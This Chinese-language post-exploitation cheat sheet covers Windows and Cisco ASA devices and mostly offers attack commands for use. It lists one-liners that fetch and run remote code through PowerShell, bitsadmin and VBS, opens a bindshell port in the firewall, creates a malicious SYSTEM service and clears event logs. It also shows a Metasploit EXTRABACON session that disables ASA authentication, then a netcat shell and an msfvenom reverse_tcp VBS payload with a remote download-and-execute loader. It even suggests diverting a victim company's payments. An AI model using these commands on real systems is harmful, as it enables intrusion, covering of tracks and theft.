在后渗透中,进行系统攻击时,应该花时间确定各个系统的功能以及不同的用户角色。例如,假设您了解了域基础架构系统,并以企业管理员身份运行或具有域管理权限。您可能是域管,但怎么与Active Directory通信的系统呢?公司的财务应用程序如何?你能否操控这个系统,然后在下一个支付阶段中,把所有的钱从公司转到别的账户上?目标的知识产权如何?
后渗透是一个棘手的事情,您必须花时间了解哪些信息可供您使用,然后将这些信息哪些又有利于你。攻击者通常会花费大量的时间在被攻陷的系统上上。像恶意攻击者一样思考 - 具有创造性,快速适应,依靠自己的智慧而不是自动化工具。
Command | Description |
NET USE \\ip \ipc$ password /user:username | 与远程服务建立一个ipc连接,如果成功,您可以尝试查看,查询....具有正确的权限. |
NET USE z: \\ip \share $ password /user:username | 将远程共享映射为本地驱动器z: |
systeminfo /S ComputerName /U username /P password | 此工具显示本地或远程计算机的操作系统配置信息,包括服务包级别. |
tasklist /S SERVER /U DOMAIN\username /P password | 显示远程机器上当前正在运行的进程的列表. |
taskkill /S SERVER /U DOMAIN\username /P password | 杀死远程服务器中的进程. |
powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))" | 从远程服务器执行代码. |
powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')" | 从远程服务器下载文件. |
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File test.ps1 | 本地执行test.ps1 |
bitsadmin /transfer systemrepair /download /priority normal http://path/to/filec:\path\local\file | 创建一个名为systemrepair 的工作来从远程服务器上下载文件. |
echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > wget.vbs<BR><BR>cscript.exe wget.vbs http://ip:port/filename C:\Windows\temp\filename | 用vbs下载文件 |
echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs<BR><BR>cscript.exe %TEMP%\msf.vbs http://ip:port/vbspayload.txt | 下载并执行metasploit vbs payload. |
PsExec.exe \\ -accepteula -u username -p password cmd.exe /c ver | 远程执行Windows命令,并返回结果 |
wmic /node:SERVER /user:DOMAIN\username /password:password process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt" | 在远程服务器上创建一个新进程。 没有命令结果返回. |
Command | Description |
NETSH INTERFACE portproxy add v4tov4 listenport=LPORT connectaddress=RHOST connectport=RPORT [listenaddress=LHOST protocol=tcp] | 将数据从本地端口传输到远程地址的指定端口. |
set http_proxy=http://your_proxy:your_port<BR>set http_proxy=http://username:password@your_proxy:your_port<BR>set https_proxy=https://your_proxy:your_port<BR>set https_proxy=https://username:password@your_proxy:your_port | 在命令行下使用代理 |
Command | Description |
NETSH FIREWALL show all | 显示域/标准配置文件的允许的程序配置. |
NETSH FIREWALL add allowedprogramC:\Windows\system32\cmd.exe cmd enable | 在防火墙允许的应用程序白名单中添加一个程序。 |
NETSH FIREWALL delete allowedprogram cmd | 从防火墙allowedprogram Whitelist删除一个项目,您也可以使用路径来删除它. |
NETSH FIREWALL show all | 显示域/标准的端口配置. |
NETSH FIREWALL add portopening tcp 4444 bindshell enable all | 将tcp端口4444添加到端口白名单中. |
Command | Description |
sc create servicename type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start servicename | 创建恶意服务,并获得本地系统特权. |
Command | Description |
net use \\IP \ipc$ password /user:username <BR>at \\ComputerName time "command" | AT命令安排命令和程序在指定的时间和日期在计算机上运行。net time [/domain] 显示当前时间. |
Command | Description |
del %WINDIR%*.log /a /s /q /f | 从%WINDIR% 目录中删除所有*.log 文件. |
wevtutil el | 列出系统保存的不同日志文件. |
for /f %a in ('wevtutil el') do @wevtutil cl "%a" | 清除特定日志的内容. |
powershell.exe -ep bypass -w hidden -c Clear-Eventlog -Log Application, System, Security | 清除特定的事件日志 |
该漏洞是由于受影响的代码区域中存在缓冲区溢出。 当在虚拟或物理思科ASA设备上启用该漏洞时,该漏洞会影响所有版本的SNMP(版本1,2c和3)。 攻击者可以通过向受影响系统上的启用SNMP的接口发送精心设计的SNMP数据包来利用此漏洞。 攻击者可能允许攻击者执行任意代码并获得对系统的完全控制或导致受影响系统的重载。 攻击者必须知道SNMP字符串才能利用此漏洞。
注意:只有指向受影响系统的流量可用于利用此漏洞。 此漏洞仅影响以路由和透明防火墙模式以及单个或多个上下文模式配置的系统。 此漏洞只能由IPv4流量触发。 攻击者需要了解SNMP版本1和SNMP版本2c中配置的SNMP公共字符串或者SNMP版本3的有效用户名和密码。
思科发布了解决此漏洞的软件更新。 此通报的变通办法
如果您对Cisco ASA设备一无所知,请尝试使用nmap或自定义工具/方法发现有用的东西。
- msf auxiliary(snmp_login) > set PASSWORD public
- PASSWORD => public
- msf auxiliary(snmp_login) > set RHOSTS
- msf auxiliary(snmp_login) > run
- [+] - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- msf auxiliary(cisco_asa_extrabacon) > show options
- Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- COMMUNITY public yes SNMP Community String
- MODE pass-disable yes Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
- RETRIES 1 yes SNMP Retries
- RHOST yes The target address
- RPORT 161 yes The target port
- TIMEOUT 1 yes SNMP Timeout
- msf auxiliary(cisco_asa_extrabacon) > run
- [*] Building pass-disable payload for version 9.2(1)...
- [*] Sending SNMP payload...
- [+] Clean return detected!
- [!] Don't forget to run pass-enable after logging in!
- [*] Auxiliary module execution completed

如果成功利用,请尝试用telnet登录。 攻击者可以不用密码登录到思科设备。
- $ telnet
- ciscoasa> ?
- clear Reset functions
- enable Turn on privileged commands
- exit Exit from the EXEC
- help Interactive help for commands
- login Log in as a particular user
- logout Exit from the EXEC
- no Negate a command or set its defaults
- ping Send echo messages
- quit Exit from the EXEC
- show Show running system information
- traceroute Trace route to destination
- ciscoasa> show version
- Cisco Adaptive Security Appliance Software Version 9.2(1)
- Device Manager Version 7.2(1)
- Compiled on Thu 24-Apr-14 12:14 PDT by builders
- System image file is "boot:/asa921-smp-k8.bin"
- Config file at boot was "startup-config"
- ciscoasa up 2 hours 25 mins
- Hardware: ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,
- Internal ATA Compact Flash, 256MB
- Slot 1: ATA Compact Flash, 8192MB
- BIOS Flash Firmware Hub @ 0x1, 0KB
- 0: Ext: Management0/0 : address is 000c.29a9.88d6, irq 10
- 1: Ext: GigabitEthernet0/0 : address is 000c.29a9.88e0, irq 5
- 2: Ext: GigabitEthernet0/1 : address is 000c.29a9.88ea, irq 9
- 3: Ext: GigabitEthernet0/2 : address is 000c.29a9.88f4, irq 10
- ASAv Platform License State: Unlicensed
- *Install -587174176 vCPU ASAv platform license for full functionality.
- The Running Activation Key is not valid, using default settings:
- Licensed features for this platform:
- Virtual CPUs : 0 perpetual
- Maximum Physical Interfaces : 10 perpetual
- Maximum VLANs : 50 perpetual
- Inside Hosts : Unlimited perpetual
- Failover : Active/Standby perpetual
- Encryption-DES : Enabled perpetual
- Encryption-3DES-AES : Enabled perpetual
- Security Contexts : 0 perpetual
- GTP/GPRS : Disabled perpetual
- AnyConnect Premium Peers : 2 perpetual
- AnyConnect Essentials : Disabled perpetual
- Other VPN Peers : 250 perpetual
- Total VPN Peers : 250 perpetual
- Shared License : Disabled perpetual
- AnyConnect for Mobile : Disabled perpetual
- AnyConnect for Cisco VPN Phone : Disabled perpetual
- Advanced Endpoint Assessment : Disabled perpetual
- UC Phone Proxy Sessions : 2 perpetual
- Total UC Proxy Sessions : 2 perpetual
- Botnet Traffic Filter : Enabled perpetual
- Intercompany Media Engine : Disabled perpetual
- Cluster : Disabled perpetual
- This platform has an ASAv VPN Premium license.
- Serial Number: 9ATJDXTHK3B
- Running Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
- Image type : Release
- Key version : A
- Configuration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016

enable可以用来进入思科配置模式。 通常,密码为空。
- ciscoasa> help enable
- enable [<priv_level>]
- enable Turn on privileged commands
- ciscoasa> enable ?
- <0-15> Enter optional privilege level (0-15)
- <cr>
- ciscoasa> enable
- Password:
- ciscoasa# configure terminal
- ciscoasa(config)# ?
- aaa Enable, disable, or view user authentication,
- authorization and accounting
- aaa-server Configure a AAA server group or a AAA server
- access-group Bind an access-list to an interface to filter
- traffic
- access-list Configure an access control element
- arp Change or view ARP table, set ARP timeout
- value, view statistics
- as-path BGP autonomous system path filter
- asdm Configure Device Manager
- asp Configure ASP parameters
- auth-prompt Customize authentication challenge, reject or
- acceptance prompt
- auto-update Configure Auto Update
- banner Configure login/session banners
- bgp-community format for BGP community
- boot Set system boot parameters
- ca Certification authority
- call-home Smart Call-Home Configuration
- checkheaps Configure checkheap verification intervals
- class-map Configure MPF Class Map
- clear Clear
- client-update Configure and change client update parameters
- clock Configure time-of-day clock
- cluster Cluster configuration
- command-alias Create command alias
- community-list Add a community list entry
- compression Configure global Compression parameters
- configure Configure using various methods
- console Serial console functions
- coredump Configure Coredump options
- crashinfo Enable/Disable writing crashinfo to flash
- crypto Configure IPSec, ISAKMP, Certification
- authority, key
- ctl-file Configure a ctl-file instance
- ctl-provider Configure a CTL Provider instance
- cts Cisco Trusted Security commands
- ddns Configure dynamic DNS update method
- dhcp-client Configure parameters for DHCP client operation
- dhcpd Configure DHCP Server
- dhcprelay Configure DHCP Relay Agent
- dns Add DNS functionality to an interface
- dns-group Set the global DNS server group
- dns-guard Enforce one DNS response per query
- domain-name Change domain name
- dynamic-access-policy-record Dynamic Access Policy configuration commands
- dynamic-filter Configure Dynamic Filter
- dynamic-map Configure crypto dynamic map
- enable Configure password for the enable command
- end Exit from configure mode
- established Allow inbound connections based on established
- connections
- event Configure event manager
- exit Exit from config mode
- failover Enable/disable failover feature
- filter Enable or disable URL, FTP, HTTPS, Java, and
- ActiveX filtering
- fips FIPS 140-2 compliance information
- firewall Switch to router/transparent mode
- fixup Add or delete inspection services
- flow-export Configure flow information export through
- NetFlow
- fragment Configure the IP fragment database
- ftp Set FTP mode
- ftp-map Configure advanced options for FTP inspection
- group-delimiter The delimiter for tunnel-group lookup.
- group-policy Configure or remove a group policy
- gtp-map Configure advanced options for GTP inspection
- h225-map Configure advanced options for H225 inspection
- help Interactive help for commands
- hostname Change host name of the system
- hpm Configure TopN host statistics collection
- http Configure http server and https related
- commands
- http-map This command has been deprecated.
- icmp Configure access rules for ICMP traffic
- imap4s Configure the imap4s service
- interface Select an interface to configure
- ip Configure IP address pools
- ip Configure IP addresses, address pools, IDS, etc
- ipsec Configure transform-set, IPSec SA lifetime and
- PMTU Aging reset timer
- ipv6 Configure IPv6 address pools
- ipv6 Global IPv6 configuration commands
- ipv6-vpn-addr-assign Global settings for VPN IP address assignment
- policy
- isakmp Configure ISAKMP options
- jumbo-frame Configure jumbo-frame support
- key Create various configuration keys
- l2tp Configure Global L2TP Parameters
- ldap Configure LDAP Mapping
- logging Configure logging levels, recipients and other
- options
- logout Logoff from config mode
- mac-address MAC address options
- mac-list Create a mac-list to filter based on MAC
- address
- management-access Configure management access interface
- map Configure crypto map
- media-termination Configure a media-termination instance
- mgcp-map Configure advanced options for MGCP inspection
- migrate Migrate IKEv1 configuration to IKEv2/SSL
- monitor-interface Enable or disable failover monitoring on a
- specific interface
- mount Configure a system mount
- mroute Configure static multicast routes
- mtu Specify MTU(Maximum Transmission Unit) for an
- interface
- multicast-routing Enable IP multicast
- name Associate a name with an IP address
- names Enable/Disable IP address to name mapping
- nat Associate a network with a pool of global IP
- addresses
- no Negate a command or set its defaults
- ntp Configure NTP
- nve Configure an Network Virtulization Endpoint
- (NVE)
- object Configure an object
- object-group Create an object group for use in
- 'access-list', etc
- object-group-search Enables object group search algorithm
- pager Control page length for pagination
- passwd Change Telnet console access password
- password Configure password encryption
- password-policy Configure password policy options
- phone-proxy Configure a Phone proxy instance
- pim Configure Protocol Independent Multicast
- policy-list Define IP Policy list
- policy-map Configure MPF Parameter Map
- pop3s Configure the pop3s service
- prefix-list Build a prefix list
- priority-queue Enter sub-command mode to set priority-queue
- attributes
- privilege Configure privilege levels for commands
- prompt Configure session prompt display
- quit Exit from config mode
- quota Configure quotas
- regex Define a regular expression
- remote-access Configure SNMP trap threshold for VPN
- remote-access sessions
- route Configure a static route for an interface
- route-map Create route-map or enter route-map
- configuration mode
- router Enable a routing process
- same-security-traffic Enable same security level interfaces to
- communicate
- scansafe Scansafe configuration
- service Configure system services
- service-interface service-interface for dynamic interface types
- service-policy Configure MPF service policy
- setup Pre-configure the system
- sla IP Service Level Agreement
- smtp-server Configure default SMTP server address to be
- used for Email
- smtps Configure the smtps service
- snmp Configure the SNMP options
- snmp-map Configure an snmp-map, to control the operation
- of the SNMP inspection
- snmp-server Modify SNMP engine parameters
- ssh Configure SSH options
- ssl Configure SSL options
- sunrpc-server Create SUNRPC services table
- sysopt Set system functional options
- tcp-map Configure advanced options for TCP inspection
- telnet Add telnet access to system console or set idle
- timeout
- terminal Set terminal line parameters
- tftp-server Configure default TFTP server address and
- directory
- threat-detection Show threat detection information
- time-range Define time range entries
- timeout Configure maximum idle times
- tls-proxy Configure a TLS proxy instance or the maximum
- sessions
- track Object tracking configuration commands
- tunnel-group Create and manage the database of connection
- specific records for IPSec connections
- tunnel-group-map Specify policy by which the tunnel-group name
- is derived from the content of a certificate.
- uc-ime Configure a Cisco Intercompany Media Engine
- (UC-IME) instance
- url-block Enable URL pending block buffer and long URL
- support
- url-cache Enable/Disable URL caching
- url-server Configure a URL filtering server
- user-identity Configure user-identity firewall
- username Configure user authentication local database
- virtual Configure address for authentication virtual
- servers
- vnmc Configure VNMC params
- vpdn Configure VPDN feature
- vpn Configure VPN parameters.
- vpn-addr-assign Global settings for VPN IP address assignment
- policy
- vpn-sessiondb Configure the VPN Session Manager
- vpnsetup Configure VPN Setup Commands
- vxlan Configure VXLAN system parameters
- wccp Web-Cache Coordination Protocol Commands
- webvpn Configure the WebVPN service
- xlate Configure an xlate option
- zonelabs-integrity ZoneLabs integrity Firewall Server
- Configuration

- ciscoasa(config)# interface ?
- configure mode commands/options:
- GigabitEthernet GigabitEthernet IEEE 802.3z
- Management Management interface
- Redundant Redundant Interface
- TVI Tenant Virtual Interface
- vni VNI Interface
- <cr>
- ciscoasa(config)# interface GigabitEthernet ?
- configure mode commands/options:
- <0-0> GigabitEthernet interface number
- ciscoasa(config)# interface GigabitEthernet 0/?
- configure mode commands/options:
- <0-2> GigabitEthernet interface number
- ciscoasa(config)# interface GigabitEthernet 0/0

- ciscoasa(config-if)# ?
- Interface configuration commands:
- authentication authentication subcommands
- ddns Configure dynamic DNS
- default Set a command to its defaults
- delay Specify interface throughput delay
- description Interface specific description
- dhcp Configure parameters for DHCP client
- dhcprelay Configure DHCP Relay Agent
- duplex Configure duplex operation
- exit Exit from interface configuration mode
- flowcontrol Configure flowcontrol operation
- hello-interval Configures EIGRP-IPv4 hello interval
- help Interactive help for interface subcommands
- hold-time Configures EIGRP-IPv4 hold time
- igmp IGMP interface commands
- ip Configure the ip address
- ipv6 IPv6 interface subcommands
- mac-address Assign MAC address to interface
- management-only Dedicate an interface to management. Block thru traffic
- mfib Interface Specific MFIB Control
- multicast Configure multicast routing
- nameif Assign name to interface
- no Negate a command or set its defaults
- ospf OSPF interface commands
- pim PIM interface commands
- pppoe Configure parameters for PPPoE client
- rip Router Information Protocol
- security-level Specify the security level of this interface after this
- keyword, Eg: 0, 100 etc. The relative security level between
- two interfaces determines the way the Adaptive Security
- Algorithm is applied. A lower security_level interface is
- outside relative to a higher level interface and equivalent
- interfaces are outside to each other
- shutdown Shutdown the selected interface
- speed Configure speed operation
- split-horizon Configures EIGRP-IPv4 split-horizon
- summary-address Configures EIGRP-IPv4 summary-address

- ciscoasa(config-if)# ip address ?
- interface mode commands/options:
- Hostname or A.B.C.D Firewall's network interface address
- dhcp Keyword to use DHCP to poll for information. Enables the
- DHCP client feature on the specified interface
- pppoe Keyword to use PPPoE to poll for information. Enables
- the PPPoE client feature on the specified interface
- ciscoasa(config)# ip address
- ciscoasa(config-if)# no shutdown
- ciscoasa(config-if)# exit
- ciscoasa(config)# exit
- ciscoasa# ping
- Type escape sequence to abort.
- Sending 5, 100-byte ICMP Echos to, timeout is 2 seconds:
- !!!!!
- Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms

- ciscoasa# configure terminal
- ciscoasa(config)# snmp-server host inside community 0 public
- ciscoasa# configure terminal
- ciscoasa(config)# username admin password password
- ciscoasa(config)# aaa authentication ssh console LOCAL
- ciscoasa(config)# passwd password
- ciscoasa(config)# crypto key generate rsa ?
- configure mode commands/options:
- general-keys Generate a general purpose RSA key pair for signing and
- encryption
- label Provide a label
- modulus Provide number of modulus bits on the command line
- noconfirm Specify this keyword to suppress all interactive prompting.
- usage-keys Generate seperate RSA key pairs for signing and encryption
- <cr>
- ciscoasa(config)# crypto key generate rsa modulus ?
- configure mode commands/options:
- 1024 1024 bits
- 2048 2048 bits
- 4096 4096 bits
- 512 512 bits
- 768 768 bits
- ciscoasa(config)# ssh inside
- ciscoasa(config)# ssh inside
- ciscoasa(config)# ssh version 2

- ciscoasa# configure terminal
- ciscoasa(config)# aaa authentication telnet console LOCAL
- ciscoasa(config)# telnet inside
如果你是一个pentester/安全研究员,你可能希望从cmd shell
r会话,例如:sqlmap --os-shell或其他工具
- $ ncat -l -p 4444
- Microsoft Windows XP [Version 5.1.2600]
- (C) Copyright 1985-2001 Microsoft Corp.
- C:\Documents and Settings\test\Desktop>ver
- ver
- Microsoft Windows XP [Version 5.1.2600]
- C:\Documents and Settings\test\Desktop>
现在,我将向您展示如何在cmd.exe中运行metasploit payload。 请尝试考虑以下问题:
- $ msfvenom -p windows/meterpreter/reverse_tcp
- LHOST= LPORT=4444 -f vbs --arch x86 --platform win
- No encoder or badchars specified, outputting raw payload
- Payload size: 333 bytes
- Final size of vbs file: 7370 bytes
- Function oSpLpsWeU(XwXDDtdR)
- urGQiYVn = "" & _
- XwXDDtdR & ""
- Set gFMdOBBiLZ = CreateObject("MSXML2.DOMDocument.3.0")
- gFMdOBBiLZ.LoadXML(urGQiYVn)
- oSpLpsWeU = gFMdOBBiLZ.selectsinglenode("B64DECODE").nodeTypedValue
- set gFMdOBBiLZ = nothing
- End Function
- Function skbfzWOqR()
- Dim GBHMAfCsea
- Set GBHMAfCsea = CreateObject("Scripting.FileSystemObject")
- Set nYosrMtHSIOKSTI = GBHMAfCsea.GetSpecialFolder(2)
- LNXsqHXEKZQU = nYosrMtHSIOKSTI & "\" & GBHMAfCsea.GetTempName()
- GBHMAfCsea.CreateFolder(LNXsqHXEKZQU)
- YeQZhbvaLPekFW = LNXsqHXEKZQU & "\" & "QoziwORKliqRDPs.exe"
- Dim voFeIDpffjdo
- Set voFeIDpffjdo = CreateObject("Wscript.Shell")
- WwqoNcaCIbw = oSpLpsWeU(cTENSbYbnWY)
- Set WQwWDbhse = CreateObject("ADODB.Stream")
- WQwWDbhse.Type = 1
- WQwWDbhse.Open
- WQwWDbhse.Write WwqoNcaCIbw
- WQwWDbhse.SaveToFile YeQZhbvaLPekFW, 2
- voFeIDpffjdo.run YeQZhbvaLPekFW, 0, true
- GBHMAfCsea.DeleteFile(YeQZhbvaLPekFW)
- GBHMAfCsea.DeleteFolder(LNXsqHXEKZQU)
- End Function
- skbfzWOqR

阅读代码,我们可以创建一个名为msf.vbs的简单的vbs脚本来执行shellcode。 vbs脚本可以在Windows XP / 2003 / Vista / 7/8/10/2008/2012 / ....上执行
- shellcode = WScript.Arguments.Item(0)
- strXML = "" & shellcode & ""
- Set oXMLDoc = CreateObject("MSXML2.DOMDocument.3.0")
- oXMLDoc.LoadXML(strXML) decode = oXMLDoc.selectsinglenode("B64DECODE").nodeTypedValue
- set oXMLDoc = nothing
- Dim fso
- Set fso = CreateObject("Scripting.FileSystemObject")
- Dim tempdir
- Dim basedir
- Set tempdir = fso.GetSpecialFolder(2)
- basedir = tempdir & "\" & fso.GetTempName()
- fso.CreateFolder(basedir)
- tempexe = basedir & "\" & "test.exe"
- Dim adodbstream
- Set adodbstream = CreateObject("ADODB.Stream")
- adodbstream.Type = 1
- adodbstream.Open
- adodbstream.Write decode
- adodbstream.SaveToFile tempexe, 2
- Dim wshell
- Set wshell = CreateObject("Wscript.Shell")
- wshell.run tempexe, 0, true
- fso.DeleteFile(tempexe)
- fso.DeleteFolder(basedir)
- Ok, how to run it in cmd.exe ? Do you want to paste the code line by line ? A simple command is created as follow:

echo shellcode = WScript.Arguments.Item(0):strXML = ^"^^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir) > %TEMP%\msf.vbs
用msf.vbs和cscript.exe执行metasploit payload:
C:\Documents and Settings\test\Desktop> cscript.exe msf.vbs <msf-vbs-shellcode>
如果脚本在本地主机上的cmd.exe中使用,则一切正常。 但是,如果它在netcat cmd shell中使用,则 payload将被破坏。例如:
- C:\Documents and Settings\test\Desktop>cscript.exe %TEMP%\msf.vbs TVqQAAMAA.....AAAAAP
- Microsoft (R) Windows Script Host Version 5.7
- Copyright (C) Microsoft Corporation. All rights reserved.
- C:\DOCUME~1\test\LOCALS~1\Temp\msf.vbs(1, 53) Microsoft VBScript compilation error: Syntax error
echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs
运行以下命令来执行您的vbs payload:
START /B cscript.exe %TEMP%\msf.vbs
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